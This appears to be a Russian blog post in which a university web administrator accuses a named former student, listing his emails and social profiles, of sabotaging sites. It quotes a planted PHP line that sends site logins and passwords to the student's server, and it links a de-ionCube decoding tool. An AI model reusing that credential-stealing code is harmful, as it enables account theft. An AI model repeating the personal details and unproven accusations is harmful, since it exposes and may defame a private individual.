Хочу рассказать о доморощенном курском хакере: Алексеев Лев Георгиевич (выпускник Юго-Западного государственного университета 2013 года).
E-mail: djiggo@gmail.com; i@djiggo.ru, Сайт: http://djiggo.ru, VK: http://vk.com/djiggo, OK: http://www.odnoklassniki.ru/profile/535897336820,
Буду условно называть его «Хитрый Админ» — ХА, ибо совсем недавно он был администратором некоторых сайтов ЮЗГУ.
Случай №1 «Кинул родную (выпустившую его как бакалавра) кафедру»
Заканчивая учёбу в университете ХА получил задание для дипломного проекта: «Создать сайт на котором должна быть карта города Курска, и любой посетитель сайта мог отметить на этой карте несанкционированные свалки», ибо его выпускающая кафедра занимается охраной окружающей среды. К данной работе были привлечены ещё два студента, один из которых мечтал поступить в аспирантуру (АС) и он разработал формулу характеризующую категорию свалки.
Ко мне (начальнику Центра предоставления информационных услуг ЮЗГУ) обратился заведующий вышеуказанной кафедры (ЮВ) с просьбой: «Посмотри всё ли работает в созданном сайте, т.к. я не разбираюсь в программировании».
ХА пришёл ко мне со странной просьбой: «Установлен ли на нашем сервере Zend?» «Нет» -говорю- «нам нет необходимости шифровать файлы». Чем поверг его в уныние. Через некоторое время он мне принёс сайт в виде одного файл index.php. Всё работало, когда я посмотрел код файла то понял что вся обработка идёт через сайт ХА, то бишь код всего сайта он мне не дал о чём я и сообщил ЮВ. Причём я позвонил ХА, что нет у меня всего кода, на что он что-то промычал, что и так сойдёт…
Короче в день защиты диплома ЮВ спросил меня: «Есть код сайта?», на что я честно ответил: «Нет».
Тут мне приходит письмо (21 июня 2013 г., 10:51): «ПЕРЕЗВОНИТЕ СРОЧНО ЮВ!!!! У МЕНЯ 5 МИНУТ» и несколько файлов в нём…
Конечно, я не хотел подставлять мальчишку и по-быстрому сделал MySQL-базу на стороннем хостинге запустил сайт. Сразу обнаружилось что нет одного файла, который ХА мне сразу и прислал. Ну и я передал, что сайт у меня есть. Правда тут же повнимательнее прочитав код я понял, что окончательная обработка форма, загружающей данные базу идёт на сайте ХА. Но было уже поздно, защита началась…
ХА сказал, что сделал сайт за два дня… и это было заметно, ибо не все объявленные функции работали: фото вроде можно грузить, но не работает, регистрация пользователей вроде объявлена, но она тоже не работает. Точки на карте ставились согласно масштаба, но так как в городе нет километровых свалок то серые точки, меньше миллиметра, просто сливались с фоном. Вверху справа была таблица, где указывалось количество отмеченных свалок, но координаты там не указывались, и чтобы найти свалку нужно настойчиво водить мышкой по карте… И ещё минус – карта использовалась от буржуйского сайта Google, которая имеет значительно меньше фишек чем сервис от Яндекса.
Но я бы не стал осуждать данный проект, ибо это диплом бакалавра (то бишь уже не студент, но ещё не инженер).
Меня просил один друг сделать такую карту, что он мог отмечать места рыбалки и грибные места… но у меня не было времени вникать в кухню создания данной карты. Во думаю дай-ка я попользую костяк программы ХА. Закинул файлы в отдельный каталог на своём сайте, ну и конечно начал убирать всю лишнюю информацию: про свалки, про авторов ну и т.п. … Сижу вечером, творю и вдруг моё творение не работает, глянул на сайте, а там вообще нет моих правленых файлов. Во, думаю ошибся при переписывании и заливаю с локального компа заново файлы. Проходит пару минут и файлов опять нет. Ну сначала я подумал просто ломанули сайт ХА, о чём я ему и послал письмо. А он мне в ответ «Ты нарушаешь мои авторские права…» ну и прочую лабуду … Короче это он удаляет мои файлы. Я конечно обалдел, как он это делает… попросил у своего хостера логи и увидел, что он в файлы моего сайта добавил свой «вредоносный» код (сайт на Joomla).
if ($_REQUEST[‘username’]) {
file_get_contents(«http://djiggo.ru/dump.php?url=» . urlencode(«login_pass: » . $_REQUEST[‘username’] . » : » . $_REQUEST[‘passwd’] . » domain: » . $_SERVER[‘HTTP_HOST’]));
}
Как говорится на лицо несанкционированное изменение программного кода, что попадает под статью УК.
Статья 273. Создание, использование и распространение вредоносных компьютерных программ (в ред. Федерального закона от 07.12.2011 N 420-ФЗ) (http://yuzgu.ru/s-inet/95-zakon-za-virus.html).
Я пишу ему, типа тормози лаптём, а то я ж могу и в Управление «К» обратиться, а там ребята если зацепятся, то уже не скажешь: «дяденька, я больше не буду!», ибо им нужно звёздочки получать. И получаю в ответ письмо с картинкой звёздочек, типа если кому не хватает я ещё пришлю…
Тут я ещё на своём хостинге включил функцию самостоятельного ведения логов, и ему пишу тебя легко вычислить по логам: вот ты зашёл из дома в Интернет и изменил мои файлы, а вот зашёл через мобильный телефон… На что этот мальчишка зашёл на мой сайт и удалил логи собранные мной самостоятельно… Ну дуралей, я просто попросил своего хостера логи за неделю…
Кстати он мне дал файл зашифрованный Zend, который легко расшифровывался с помощью Free_De-ionCube_By_Ps2Gamer_&_Cyko_1_0_0_2 (http://avfree.idhost.kz/index.php?article147/dezender).
Разбираться в чужом коде не благодарное занятие… но я как лох печальный оставил оставил его файлы у себя на сайте…
Конечно я не стал сдавать этого мальчишку… просто сам поискал в Интернете как сделать такой сервис и конечно нашёл довольно подробное описание (кстати на сайте Яндекс описание написано довольно забубённо…) — http://webmap-blog.ru/yandex-maps. Там есть описание, как всё сделать на Google, но мне больше понравился Яндекс… И я сделал такие наброски http://yuzgu.ru/otios/ : здесь точки явно выражены на карте, независимо от масштаба карты… но это было для меня понятие принципа, как ставить точки на карте… Сделать формулы на php характеризующую категорию свалки это плёвое дело, которое мне совсем не интересно…
Конечно ссылку на сайт-программу ХА я заменил на свою чем несказанно порадовал ЮВ… Но он поговорил с научным руководителем товарища ХА, который желал попасть в аспирантуру, и для АС вдруг не оказалось места…
А ХА не успокоился: он на мою карту впендюрил SQL-инекцию и она забилась одинаковой фразой в балунах Яндекс-карты, типа «Не воруйте наши идеи», после удаления всех файлов ХА с моего сайта он больше ничего не смог сделать…
Конечно ссылку на сайте университета на супер-программу ХА я не удалял, просто после подписания обходного листа ХА просто удалил обработчик со своего сайта! и я был вынужден поменять ссылку на свой вариант.
А потом ко мне на работу пришёл АС… Ну мне конечно жалко было его, но проблему не я ему создал а ХА… Но АС начал мне гнать волну: «Я диплом сделал, Вы удалили сайт из Интернета…», а ему говорю сайт типа у ХА… Этот лох-печальный начал защищать ХА, «это его интеллектуальная собственность и он Вам его не отдаст…» … Дык я уже и не хочу его… «А меня из-за того, что нет сайта не пускают в аспирантуру». А удивился: «А я тут при чём?». «А Вы выставили незаконно свою программу, которая копирует нашу…»- «Погодь» — говорю я — «Ваша программа на какой карте сделана?» — «Google» — «А моя на Яндексе!», «Ну и что — а идея!» — «Дык давай я в Google запрос: ‘Карта с несанкционированными свалками’ и найду сотню похожих программ!», на что был классный ответ: «Сотню не найдёте… ну может 5-10…» — «Да, какая разница, хоть одну найду — уже идея не уникальна…»
Короче подставил ХА своего русского друга (вроде у ХА была недавно армянская фамилия), ибо пролетел он над аспирантурой как фанера над Парижем :)… Хотя начальство подумало и решило, что из-за вредного ХА не должен страдать русский парень и его взяли в аспирантуру…
Случай №2 «Кинул студенческое научное общество родного университета»
Кстати АС кинул интересную фразу, типа ХА написал и обслуживает много сайтов в университете… для меня это было откровение, ибо я главный админ по сайтам университета и про Алексеева ничего не слышал…
Но оказалось я многого не знаю 🙂 ибо этот ХА прибился к студенческому научному обществу (его начальник ЖВ помогал этому студенту сдавать проблемные экзамены) и написал для их сайта примитивную программу для обработки базы данных MySQL, а этот доверчивый руководитель СНО ЖВ дал ему полный админский доступ к сайту… Кстати за написанную программу ХА получил реальные деньги по какому-то гранту… но когда он получил свой бакалаврский диплом он просто удалил весь код программы с сайта… ибо захотел что бы ему ещё заплатили. Это повергло ЖВ в шок, ибо идти к ректору это признать, что ты не контролируешь ситуацию… Ну, короче он плюнул на ХА и впредь будет умнее…
Выводы
Возможно ХА и умеет писать программы для Интернета… но я бы сто раз подумал, прежде чем заказать таковую у него…